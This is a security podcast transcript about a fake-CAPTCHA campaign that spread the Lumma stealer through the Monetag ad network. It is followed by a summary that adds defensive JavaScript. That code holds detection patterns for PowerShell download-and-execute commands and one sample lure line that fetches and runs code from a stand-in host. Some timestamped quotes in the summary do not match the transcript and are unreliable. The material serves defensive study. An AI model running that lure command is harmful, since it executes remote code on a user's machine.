
Dave Bittner
You're listening to the CyberWire network, powered by N2K. Hey, everybody, Dave here. Have you ever wondered where your personal information is lurking online? Like many of you, I was concerned about my data being sold by data brokers, so I decided to try DeleteMe. I have to say, DeleteMe is a game changer. Within days of signing up, they started removing my personal information from hundreds of data brokers. I finally have peace of mind knowing my data privacy is protected. DeleteMe's team does all the work for you, with detailed reports so you know exactly what's been done. Take control of your data and keep your private life private by signing up for DeleteMe now, at a special discount for our listeners today. Get 20% off your DeleteMe plan when you go to JoinDeleteMe.com/N2K and use promo code N2K at checkout. The only way to get 20% off is to go to JoinDeleteMe.com/N2K and enter code N2K at checkout. That's JoinDeleteMe.com/N2K, code N2K. Hello, everyone, and welcome to the CyberWire's Research Saturday. I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
Nati Tal
How did they manage to go to such a large scale in such a short time?
Dave Bittner
That's Nati Tal, head of GuardioLabs. The research we're discussing today is titled "DeceptionAds: Fake Captcha Driving Infostealer Infections and a Glimpse to the Dark Side of Internet Advertising."
Nati Tal
Because something else is going on, and we want to understand what, and be able to maybe in the future stop those kinds of things at the beginning, before they continue to propagate at such scale. So basically, the fake captcha is something that we were familiar with, like, a year ago, something like that. It's actually a funny story, because the fake captcha like we see today, used by threat actors and all those bad guys and scammers all around, started off as an educational repo on GitHub for testing and for raising awareness by some of the community, cybersecurity community members, some that we know, but I won't say names now. And eventually they saw it as a good opportunity to educate, and scammers just took it and said, oh, that's great, let's just fork this repo, change the title, and that's it. And the real deal behind it is, again, the payload itself, which is Lumma Stealer and some other variants of that. But the interesting part of it, and this is what we also focused on in our research, is more the propagation: how you actually get those fake captchas to pop up on users' computers, on their screens, in the first place, and at such scale. And this is what was interesting for us, because again, taking this kind of phishing page out of a repo and duplicating it, nothing innovative here, but the real deal is actually weaponizing this kind of simple phishing page, and at such scale.
Dave Bittner
Well, before we dig into some of the details of the work that you all did here for folks who might not be familiar with it, can you give us a little explanation of how exactly this fake captcha stealer campaign works?
Nati Tal
Well, the phishing page itself, and this is why we also call it fake captcha, is basically a captcha page like we are already kind of used to seeing when we go to specific websites, just to make sure we are not bots or something like that. And it's kind of our day to day when we enter those kinds of websites and are asked to make sure we are human. So sometimes you need to, I don't know, find the traffic lights in those pictures, or some other kind of stuff, or just click on a button, and okay, you're okay, you're not a bot or a computer. And because we are so used to it, this is the exact point where scammers are entering and using it. When you have your kinds of regular stuff you're doing all the time, searching on Google and clicking on the first result you get, or entering a website and being asked to make sure you're human, this is where scammers are eager to enter and use those kinds of activities. Because you are used to it, it's okay if you get a captcha. Let's go on with it. Let's just say that I want to see the website. And this is exactly what they did, only that instead of just clicking on a button or selecting those traffic lights, you are asked to click on some buttons on your computer. Again, it's a bit strange, it's not like you are used to, but for the regular user it sounds legit. Click on some buttons and then it's all okay. But those buttons are not just any buttons, specifically targeting Windows systems. If you click on Control R, you get the Run command, and if you click on Control V, you paste a payload they already placed in your clipboard, that is actually a one-liner code execution with PowerShell or any other kinds of variants we found lately. Without even being aware, you are executing code on your computer.
And what this code does, eventually, after downloading a file and running some more commands, but it's all done in the background, is you get yourself hit with a stealer, and all your personal information, accounts, and everything, all is, like, in a matter of seconds, in the hands of the scammers.
Dave Bittner
So you and your colleagues wanted to get to the bottom of this. And I hate to be a spoiler, perhaps a spoiler alert here, but it all comes down to ad networks, doesn't it?
Nati Tal
Yeah, eventually. And again, nothing new here, of course, because we already talked about it in the last few years in other research by Guardio, and not only us, of course, about abuse of any kind of ad network, like Facebook itself even, and Google search results that show up like fake pages of Slack and Notion and others, and OBS even. And all of this is not new. But when we started analyzing specifically this campaign, it was quite obscure to see that all of the flow, all of the victims of these specific campaigns, come eventually from one single ad network. And you're not used to seeing stuff like that. Basically, threat actors try to propagate from different aspects: by emails, SMSs, search results, just SEO poisoning even. But in this case it was orchestrated entirely by one ad network that we didn't know before. And when we dug in and tried to analyze the origin of this flow, it's like you're opening a Pandora's box. Of course you realize that, again, it's one ad network. And if you analyze the entire ad network, you see that around, I don't know specifically, but more than half of the ads that it will eventually pop on your computer are malicious in some way or not entirely legit. And not only that, the publisher websites, meaning the sites that monetize their traffic with this ad network, they also share too much of their characteristics together, meaning it sounds and feels like everything is orchestrated from the beginning to the end. Again, it's just me saying that; I don't have the exact smoking gun, but we are working on it. But again, you see so many publisher websites that are more of the same, mostly pirated content and video streaming and movies and anime, and of course adult content. And all those websites are practically the same, they look and feel the same. We even found some repos on GitHub of those websites. Just fork it, change the specific tag for your convenience, for your specific ad network you're using, and upload it, and that's it.
You have a site, you can monetize all your traffic. And all the ad networks there were practically from the same actor. In this case, the actor, not the threat actor, is a company, an ad network that is eventually legit: PropellerAds, that are very powerful and they work all around the world, and everything is legit and okay. But we see, like, sub-companies or small companies or different brands that are behind the infrastructure, and also the name of PropellerAds, that are eventually used in many cases, I can't say most, I can't say it's intentional, but they are used for propagation of malicious content at the end of it.
Dave Bittner
Yeah. Well, let's walk through it together step by step here. I mean, can you take us through how is this ad network being used? How do things end up in their network and then ultimately on our systems? Can you take us through that journey?
Nati Tal
Well, let's make it from the point of view of a publisher. In the ad network's lingo, a publisher is a website that wants to monetize its traffic. So for example, I am a website that wants to stream movies. Those movies are probably pirated, and, you know, I'm not Netflix, but I want to monetize traffic. So I have a host, I have a domain, and I created some kind of website, or even, if I look around, I found some templates already made for movies and streaming. So I upload this website, and now I want to monetize my traffic. So I go to any kind of ad network, I register a user there, and I add my website, my domain, to their system, set it up on my main page or any other page of my website, and basically that's it. From that moment on, this specific ad network, in our case in this research it was an ad network named Monetag, so from this moment on, every visitor that visits my website, they get my content, but also have a script managed and created by Monetag running in their browser. So what this script actually does is create an ad zone, meaning a specific zone for advertising on my website. I choose if I want it to be a pop-up or a pop-under, in their lingo. It used to be pop-under, behind your website. It's not working anymore.
Dave Bittner
Yeah, everybody hated those.
Nati Tal
Yeah, yeah, we did. We saw some people trying to bring it back and try other techniques to create those pop-unders. Some made it, but again, this time Chrome is fast in fixing those kinds of bugs or exploitations. Now we have pop-ups. Again, it's not legit as well, and you have pop-ups and you have push notifications and you have fake push notifications that jump on top of your website. But anyway, from that moment on, Monetag is controlling my website and presenting ads as I requested. And in this case, the most hateful, I guess, type of advertising is those pop-ups, where everywhere you click on the page a new tab is popping up with different content from what you were looking for. And what happens at this specific moment is a new tab is opened. It goes to Monetag's infrastructure, or traffic distribution system, TDS as we call it, which is a list, in this case, of thousands of domains used specifically to trigger those kinds of advertisements. What they do is try to fingerprint who I am, the visitor, what kind of computer I have, what kind of social networks I use. They even try to load some resources from Facebook and Twitter/X and stuff like that, just to fingerprint who I am and what would be the most, the perfect advertisement to show me in their case. And from that moment, when they have their decision, they're moving me on to their advertising. And the same, this monetized ad network has publishers, the ones that created those websites and monetize all the traffic, and advertisers that show their creatives and any kind of other advertisement and ask those advertisements to be shown to visitors. And from that moment on, an advertisement is selected, and we move on with redirects and other tricks to showing this specific advertisement. In the fake captcha, specifically in the fake captcha campaign,
it was more complex, which is also something that we realized is not there for, I don't know, for statistics or for other kinds of technicalities, but specifically to try to obfuscate, or to even make it harder for analysts like us to realize something bad is happening, or, well, this is exactly what's happening. So what they did is, instead of using the endpoint, the fake captcha page URL, they were using some other, we call them cloakers, other services that are again from the ad industry, ad statistics, in this case BeMob, and made the link for the advertisement be a BeMob-created link, flowing eventually to the real URL of the fake captcha. So from Monetag to BeMob, and again on the same occasion also there analyzing who is the visitor, et cetera, et cetera, and then eventually redirecting you to the fake captcha page.
Dave Bittner
We'll be right back.
Dave Bittner
Cyber threats are evolving every second, and staying ahead is more than just a challenge. It's a necessity. That's why we're thrilled to partner with ThreatLocker, the cybersecurity solution trusted by businesses worldwide. ThreatLocker is a full suite of solutions designed to give you total control, stopping unauthorized applications, securing sensitive data, and ensuring your organization runs smoothly and securely. Visit threatlocker.com today to see how a default deny approach can keep your company safe and compliant. Do you know the status of your compliance controls right now? Like, right now? We know that real-time visibility is critical for security, but when it comes to our GRC programs, we rely on point-in-time checks. More than 8,000 companies like Atlassian and Quora have continuous visibility into their controls with Vanta. Here's how: Vanta brings automation to evidence collection across 30 frameworks like SOC 2 and ISO 27001. They also centralize key workflows like policies, access reviews, and reporting, and help you get security questionnaires done five times faster with AI. Now that's a new way to GRC. Get $1,000 off Vanta when you go to vanta.com/cyber. That's vanta.com/cyber for $1,000 off. So one of the things you point out in the research is this is set up in a way that makes it harder to point the finger at any one particular organization, right? I think in your research there are, like, four different organizations who, along the way of delivering this ad, all have a hand in what's going on here. But they can all kind of point to each other and say, no, it's not us, it's them. They're the responsible party.
Nati Tal
Exactly. We call it the fragmented accountability of the ad network system. And this is exactly what makes it perfect for scammers, because again, ad networks, they are legit, everything is okay. The entire ecosystem of the Internet basically is based on advertisement. You know, if it's free, you are the product. Yeah. So what they are using in this case is a long, long chain, like we just talked about, you know, from the publisher website to Monetag to their TDS to BeMob to another cloaker, et cetera, and eventually to the host that hosts this landing page, or in this case the fake captcha, which is also a legit host. In this case, even Oracle Cloud was used, and Cloudflare itself in some cases. So this long chain of accountability is what makes it harder for us security researchers, and basically the entire security community, to be able to block those kinds of campaigns. We tried it. One of the first things we did at Guardio was to collect all the data, understand exactly what is happening, who are the actors in this chain, and contact them. So we contacted, and it's a good example to see how hard it is to actually get those kinds of campaigns down for good. We contacted Monetag. After a few days, they answered back. We gave them all the URLs we see and all the data we have. And indeed, they took it down. They said that they had around 200 different advertiser accounts used specifically for this campaign. So this was one part of it. Then we got to BeMob, that were used, or abused in this case, as well. They also talked to us quite quickly, a few days, like two days later, and took down all their accounts as well. And we did see the campaign going down for almost a week, which is great, of course. But, and here comes the important part of it, so we took it down. First of all, it took us around a week of emailing, and, you know, it's not that simple to say to a company that, okay, you have a customer that is abusing your system.
I know this customer is paying you, you have your obligation to that customer, but you need to take him down. It's hard to say that to a company. And you need to be very, to give all the information, the real information. It's not always that simple to get this kind of information. And this is why it took us a few days just to interact with Monetag in this case. But in those few days, millions of people got those captcha pages, and probably hundreds of thousands of them at least actually had those stealers installed on their system and got infected. So even though this is, like, the first part of it, the part that makes it harder to act quickly, on the other hand, it was down for a week or something like that, it got back quite quickly on the same ad network again after a few days. And again we approached them and they took them down again, a few more accounts, et cetera. But on a parallel path, the threat actors realized, okay, we now understand they got us on Monetag, no worries, we have, like, a hundred other ad networks to use. And they do have those hundred other ad networks like Monetag. And we quickly saw the same campaign, same pages, even same hosts, that we also approached to take down those kinds of pages, again, new accounts, new ad networks, and the campaign is right back. Like, it took them four days to get back to the same scale it was before.
Dave Bittner
Right. Well, I mean, without calling anyone out specifically here, I suppose there's a lot of money to be made by turning a blind eye to this sort of thing.
Nati Tal
Exactly. And this is also something that we suspect, of course. And again, I don't have the smoking gun just yet, but this is a big industry, and a lot of money, lots and lots of money, in advertisements. And again, not only in advertisement, but also those threat actors, there is a reason why they are doing that as well. And because they are persistent, and the ad networks are persistent, and they want to continue their business as usual, it's hard to actually report and take down those kinds of threats. And this is also why, okay, we approach them just to see that everything is okay. And it's our first approach to Monetag. In this case, we wanted to see who are the people behind this company, and that everything is legit and okay. But again, if not Monetag, there are, like, hundreds of other names, I can tell you, even some new, very funny names. I have to mention them: the guys from Infoblox, that we also cooperated with on this research, and they are also working on those kinds of TDSs for years now, and they just realized a new ad network, even two ad networks, were created out of the blue, and one is called, it's all for the Breaking Bad enthusiasts, Los Pollos ad network, and Taco Loco with .co as the TLD of the domain. And great graphics, really great graphics, and amazing websites for those ad networks. But again, you look at those ad networks and you understand that it's just another fork of Monetag stuff and other networks that are part of bigger networks, just to be able to spread around different kinds of networks, different kinds of obligations, accountabilities, just to keep the business rolling and not stopping.
Dave Bittner
I mean, it reminds me, I think we've all been in that situation where you're using an ad blocker and you'll go to visit a site and it pops up and says, so we see you're using an ad blocker, please disable your ad blocker. But this sort of research, I think, is a good reminder that ad blockers are security, right? Because so many ads out there are malicious.
Nati Tal
Yes and no. And I'll try to answer that. Well, again, also for us, by the way, any user of the Internet, if you block all advertisements for all the Internet users all around the world, there won't be any Internet. So we need to remember that as well. But saying that, as you can see, many ad networks are being abused, even Google and Facebook are abused for malicious content at scale. And some, I guess, again, no smoking gun yet, are there specifically for those reasons, because the big money is there. But again, ad blocking is important, but it's not only about ads. So you will get this kind of malicious content from any kind of other path: email, SMS, posts on Facebook, on social, and whatever. Also, specifically for Monetag, they have created some quite sophisticated obfuscation for their code that makes it harder, much harder, for ad blockers to be able to block it. And not only that, we mentioned also another phrase, TDS, traffic distribution system. Again, it's a list of thousands and thousands of domains. Those are the domains that those ad blockers need to block, any kind of request for those domains, but those domains are changed and regenerated on a daily basis. So if you have an ad blocker, it will work on some of the sites; a day later, on most of the sites, it won't work. They're already using different domains. They know what they're doing in this case.
Dave Bittner
Right, right.
Nati Tal
So you need to also block those kinds of TDSs, also block the actual malicious content. And most importantly, and this is what is our holy grail here at Guardio, not only block specific content, because they can change it and make many variants, like, a few minutes later, and you won't block it. Don't fingerprint malicious content, it won't work. And also don't fingerprint domains, because domains change all the time. What we do is mostly look at the flow: where you get this information from, where you get this pop-up from, what you did before, what you're doing after. And because we know how threat actors work and where they want to hit their victims, and pinpoint the specific area where it's the best place to place this kind of fake captcha, for example, we look at the flow and then we can block these kinds of anomalies even without knowing what is the malicious content at the end.
Dave Bittner
Our thanks to Nati Tal from GuardioLabs for joining us. The research is titled "DeceptionAds: Fake Captcha Driving Infostealer Infections and a Glimpse to the Dark Side of Internet Advertising." We'll have a link in the show notes. That is Research Saturday, brought to you by N2K CyberWire. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com. This episode was produced by Liz Stokes. We're mixed by Elliott Peltzman and Tré Hester. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here next time.
Liz Stokes
Hey, everyone, grab your favorite mug and put the kettle back on the stove, because Afternoon Cyber Tea is coming back. This season, I am joined by an all-star team of thought leaders and industry experts to dive into the critical trends that are shaping the future of cybersecurity. We will explore how these technologies are revolutionizing the way we work, the way we live, and the way we interact with the world around us. And as always, we will be bringing you thought-provoking discussions and fresh perspectives on what is driving the future of cybersecurity and what leaders can do now to protect their teams tomorrow. New episodes will be coming to you in February, every other Tuesday. So subscribe now wherever you get your favorite podcasts.
CyberWire Daily: Episode Summary
Title: Bot or not? The fake CAPTCHA trick spreading Lumma malware. [Research Saturday]
Release Date: February 15, 2025
Host: Dave Bittner
Guest: Nati Tal, Head of GuardioLabs
In this episode of CyberWire Daily, host Dave Bittner engages in an in-depth discussion with Nati Tal from GuardioLabs about a sophisticated cyber threat involving fake CAPTCHA pages used to disseminate Lumma malware. This research illuminates the evolving tactics of cyber adversaries and the intricate role of ad networks in facilitating such attacks.
Nati Tal explains the emergence and escalation of fake CAPTCHA phishing pages. Originally designed as educational tools within the cybersecurity community, these CAPTCHA replicas were repurposed by scammers to deceive users.
Nati Tal [02:22]: "The fake captcha is something that we were familiar with like a year ago... eventually they saw it as a good opportunity to educate and scammers just took it and said, oh, that's great, let's just fork this repo, change the title, and that's it."
These malicious CAPTCHA pages mimic the verification prompts users see every day, but instead of a checkbox or image puzzle they ask the visitor to press a key combination. The page has already placed a one-liner in the clipboard; the keystrokes open the Windows Run dialog, paste that command, and execute it, so the user launches the downloader themselves without anything being exploited in the browser.
The campaign leverages user familiarity with CAPTCHA prompts to initiate malware installation seamlessly. Nati Tal details how unsuspecting users are manipulated into executing malicious commands:
Nati Tal [04:38]: "Instead of just clicking on a button or selecting those traffic lights, you are asked to click on some buttons on your computer... clicking on Control R... executes a payload... running commands... all done in the background and you get yourself hit with a stealer."
Because the victim performs the paste and execution, the page never has to drop a file or trigger a download warning; the one-liner fetches and runs the stealer in the background, and credentials, sessions, and account data are in the scammers' hands within seconds.
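The clipboard write is the one step of this lure that happens inside the browser, so it is where a client-side control can intervene. The following is an added example, not code from the podcast or from Guardio Labs: a guard in the style of a browser-extension content script that wraps navigator.clipboard.writeText and refuses text that looks like a paste-into-Run one-liner (an interpreter plus a download or execute verb, a hidden-window switch, an encoded command). The pattern list, the two-indicator threshold, the fake navigator object, and the sample strings are all constructed for illustration; the sample lure points at the reserved .invalid TLD and is not taken from the campaign.

```javascript
// Added example, not code from the podcast or from Guardio Labs. A clipboard guard in the
// style of a browser-extension content script: it wraps navigator.clipboard.writeText and
// refuses text that looks like a "paste this into Run" one-liner. Pattern list, threshold,
// the fake navigator and the sample strings are constructed for illustration.

const SUSPICIOUS_PATTERNS = [
  { name: "powershell", re: /\b(powershell|pwsh)(\.exe)?\b/i },
  { name: "mshta", re: /\bmshta(\.exe)?\b/i },
  { name: "cmd-switch", re: /\bcmd(\.exe)?\s+\/[ck]\b/i },
  { name: "download-cmdlet", re: /\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b/i },
  { name: "eval-cmdlet", re: /\b(iex|invoke-expression)\b/i },
  { name: "encoded-command", re: /-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}/i },
  { name: "hidden-window", re: /-w(indowstyle)?\s+hidden\b/i },
  { name: "remote-url", re: /\bhttps?:\/\/[^\s"']+/i },
  { name: "curl-pipe-shell", re: /\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b/i },
];

// Scores a candidate clipboard string. One indicator alone (a URL, the word "powershell")
// is ordinary clipboard traffic; the lure needs both a way to run code and a way to fetch
// it, so two independent indicators are required before the text is called suspicious.
function analyzeClipboardText(text) {
  const hits = SUSPICIOUS_PATTERNS.filter((p) => p.re.test(text)).map((p) => p.name);
  return { score: hits.length, hits, suspicious: hits.length >= 2 };
}

// Replaces nav.clipboard.writeText with a checking wrapper and returns a function that
// restores the original. onBlock receives the rejected text and the verdict.
function installClipboardGuard(nav, onBlock = () => {}) {
  const original = nav.clipboard.writeText.bind(nav.clipboard);
  nav.clipboard.writeText = async function guardedWriteText(text) {
    const verdict = analyzeClipboardText(String(text));
    if (verdict.suspicious) {
      onBlock(String(text), verdict);
      throw new Error("clipboard write blocked: " + verdict.hits.join(", "));
    }
    return original(text);
  };
  return () => { nav.clipboard.writeText = original; };
}

// Constructed stand-in for window.navigator so the example runs under Node without a browser.
function makeFakeNavigator() {
  const state = { clipboard: "" };
  return { state, clipboard: { async writeText(t) { state.clipboard = t; } } };
}

// Constructed samples. The first imitates the shape of a ClickFix-style one-liner
// (hidden window, download, execute) and points at the reserved .invalid TLD.
const SAMPLE_LURE = 'powershell -w hidden -c "iwr https://verify.example.invalid/c.txt | iex"';
const SAMPLE_BENIGN = "Your verification code is 7F2A-91";

// Runs both samples through a guarded navigator and reports what happened.
async function demo() {
  const nav = makeFakeNavigator();
  const blocked = [];
  installClipboardGuard(nav, (text, verdict) => blocked.push({ text, hits: verdict.hits }));
  await nav.clipboard.writeText(SAMPLE_BENIGN);
  let lureBlocked = false;
  try {
    await nav.clipboard.writeText(SAMPLE_LURE);
  } catch (err) {
    lureBlocked = true;
  }
  return { lureBlocked, clipboardNow: nav.state.clipboard, blocked };
}

demo().then((r) => console.log(JSON.stringify(r, null, 2)));
```

The threshold is the part worth tuning: a lone URL or a lone mention of PowerShell is normal clipboard content, so a single hit never blocks on its own. A real extension would wrap document.execCommand("copy") and the copy event's clipboardData as well, since lure pages use those paths to avoid the async API.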
A pivotal focus of the research is the exploitation of ad networks to propagate the malicious CAPTCHA pages at scale. Nati Tal highlights how a single ad network, Monetag, became the backbone of this widespread attack.
Nati Tal [07:37]: "All of the flow, all of the victims of these specific campaigns come eventually from one single ad network."
Nothing malicious is hosted on the publisher sites themselves. Publishers, mostly pirated streaming, anime, and adult sites built from shared templates, embed Monetag's script to monetize traffic; the script opens a new tab on every click, and that tab lands on Monetag's traffic distribution system, thousands of rotating domains that fingerprint the visitor and redirect to the selected advertiser's link, which in this campaign ended at the fake CAPTCHA page. That separation is why the pages spread at scale without immediate detection.
The research delves into the sophisticated methods used to obscure the malicious activities, making it difficult for security analysts to trace and mitigate the threat. Nati Tal explains the use of multiple intermediary services and cloakers:
Nati Tal [13:46]: "They were using some other services that are again from the ad industry... increasingly using different domains and techniques to obfuscate the malicious content."
By routing the ad through BeMob tracking links and other cloakers, and by rotating TDS domains daily, the operators keep every hop looking like ordinary ad-tech plumbing and stay ahead of domain-based blocklists in ad blockers and other security tools.
Addressing the fragmented accountability within ad networks presents significant hurdles. Nati Tal discusses the difficulties in holding any single entity accountable due to the layered infrastructure supporting the attacks.
Nati Tal [20:19]: "This is the fragmented accountability of the ad network system... it makes it perfect for scammers, because again, ad networks, they are legit, everything is okay."
Even after Monetag removed roughly 200 advertiser accounts tied to the campaign and BeMob took down the accounts Guardio reported, the campaign was back on the same network within days, and within about four days it had returned to its previous scale through new accounts and other ad networks, perpetuating the cycle of infection.
The persistent nature of the threat underscores the lucrative incentives behind such cybercrimes. Despite efforts to dismantle the malicious infrastructure, the ease with which attackers can regenerate and reroute their campaigns ensures ongoing vulnerability for users.
Nati Tal [25:16]: "There's a lot of money in advertisements... ad blocking is important, but it's not only on ads... it's hard to actually report and take down those kinds of threats."
GuardioLabs argues that fingerprinting the malicious content or the TDS domains cannot keep up, because the content changes within minutes and the domains within days. Its approach is to look at the flow instead: where the pop-up came from, what the user did before it appeared, and what the page does afterwards, and to block that anomaly even without knowing what the final payload is.
Nati Tal [30:08]: "We can block these kinds of anomalies even without knowing what is the malicious content at the end."
By focusing on the overall flow and contextual behavior, GuardioLabs aims to preemptively identify and halt malicious activities before they can inflict harm.
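As an added example, not Guardio's code, of what "looking at the flow" can mean in practice, the classifier below scores a navigation chain by its shape rather than by any domain list or payload signature: a click on the page that spawns a tab on an unrelated site, a redirect chain crossing several registrable domains, on-page text telling the user to press Win+R and then Ctrl+V, and a clipboard write that did not come from a copy control. The event schema, the weights, the simplified eTLD+1 helper, and the three sample chains (all on reserved .example names) are constructed for this example.

```javascript
// Added example, not code from the podcast or from Guardio Labs. A flow classifier that
// scores the shape of a navigation chain instead of matching domains or payloads. Event
// schema, weights, the simplified eTLD+1 helper and the sample chains (reserved .example
// names) are constructed for illustration.

// Simplified registrable-domain helper: last two labels. Enough for the constructed
// samples; production code would consult the Public Suffix List.
function registrableDomain(hostname) {
  if (!hostname) return "";
  return hostname.toLowerCase().split(".").slice(-2).join(".");
}

// "Press Win+R ... then Ctrl+V" style instructions, tolerant of spacing around the plus.
const KEY_PROMPT = /\b(win(dows)?(\s*key)?|ctrl|control)\s*\+\s*r\b[\s\S]*\b(ctrl|control)\s*\+\s*v\b/i;

// Events are in tab order:
//   { type: "tab_opened", trigger: "click" | "user_navigation", openerHost, host }
//   { type: "navigation", host, status }          one per hop, landing page last
//   { type: "dom_text", host, text }               visible text on the landing page
//   { type: "clipboard_write", host, gesture }     gesture: "copy-button" | "page-click"
function classifyFlow(events) {
  const reasons = [];
  let score = 0;

  const opened = events.find((e) => e.type === "tab_opened");
  if (opened && opened.trigger === "click" &&
      registrableDomain(opened.openerHost) !== registrableDomain(opened.host)) {
    score += 2;
    reasons.push("click on the page opened a tab on an unrelated site");
  }

  const sites = new Set(events.filter((e) => e.type === "navigation").map((e) => registrableDomain(e.host)));
  if (sites.size >= 3) {
    score += sites.size >= 5 ? 3 : 2;
    reasons.push("redirect chain crossed " + sites.size + " distinct sites");
  }

  const prompt = events.some((e) => e.type === "dom_text" && KEY_PROMPT.test(e.text));
  if (prompt) {
    score += 2;
    reasons.push("page tells the user to press Win+R and then Ctrl+V");
  }

  const write = events.find((e) => e.type === "clipboard_write");
  if (write && write.gesture !== "copy-button") {
    score += 1;
    reasons.push("clipboard written from a generic page click, not a copy control");
    if (prompt) {
      score += 2;
      reasons.push("clipboard write combined with the key-combination prompt");
    }
  }

  const verdict = score >= 6 ? "block" : score >= 3 ? "warn" : "allow";
  return { score, verdict, reasons };
}

// Constructed chain in the shape described above: pirated-streaming publisher, pop-up tab,
// TDS and tracker hops, fake CAPTCHA landing page.
const LURE_FLOW = [
  { type: "tab_opened", trigger: "click", openerHost: "watch-free-movies.example", host: "a1b2c3.ads-hop.example" },
  { type: "navigation", host: "a1b2c3.ads-hop.example", status: 302 },
  { type: "navigation", host: "tds-9f8e.example.net", status: 302 },
  { type: "navigation", host: "trk.tracker.example.org", status: 302 },
  { type: "navigation", host: "verify-human.example.com", status: 200 },
  { type: "dom_text", host: "verify-human.example.com",
    text: "Verification steps: 1. Press Windows + R  2. Press CTRL + V  3. Press Enter" },
  { type: "clipboard_write", host: "verify-human.example.com", gesture: "page-click" },
];

// Constructed ordinary pop-up ad: same publisher and hop pattern, harmless landing page.
const AD_FLOW = [
  { type: "tab_opened", trigger: "click", openerHost: "watch-free-movies.example", host: "go.adnet.example" },
  { type: "navigation", host: "go.adnet.example", status: 302 },
  { type: "navigation", host: "click.tracker.example.net", status: 302 },
  { type: "navigation", host: "shop.example.org", status: 200 },
  { type: "dom_text", host: "shop.example.org", text: "Summer sale, 30% off everything" },
];

// Constructed benign flow: user typed the URL, one same-site redirect, a real copy button.
const BENIGN_FLOW = [
  { type: "tab_opened", trigger: "user_navigation", openerHost: null, host: "docs.example.com" },
  { type: "navigation", host: "docs.example.com", status: 301 },
  { type: "navigation", host: "www.docs.example.com", status: 200 },
  { type: "dom_text", host: "www.docs.example.com", text: "Copy install command" },
  { type: "clipboard_write", host: "www.docs.example.com", gesture: "copy-button" },
];

for (const [name, flow] of [["lure", LURE_FLOW], ["ad", AD_FLOW], ["benign", BENIGN_FLOW]]) {
  console.log(name, JSON.stringify(classifyFlow(flow)));
}
```

The weights are where the judgment lives: the lure chain is blocked on its shape alone, the ordinary pop-up ad from the same publisher only warns, and a real copy button never trips the clipboard rule. Because no hop is compared against a list, the daily domain rotation described in the interview does not change the verdict.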
The episode concludes with reflections on the resilience and adaptability of cyber threats facilitated by ad networks. Nati Tal underscores the necessity for continuous innovation in security measures to stay ahead of evolving tactics.
Dave Bittner [31:30]: "Our thanks to Nati Tal from GuardioLabs for joining us... keeping you a step ahead in the rapidly changing world of cybersecurity."
This conversation highlights the critical interplay between cybercriminal strategies and the defensive mechanisms required to counteract them, emphasizing the ongoing battle to secure the digital landscape.
For a comprehensive understanding and detailed insights, listeners are encouraged to refer to the full episode of CyberWire Daily and explore the research conducted by GuardioLabs.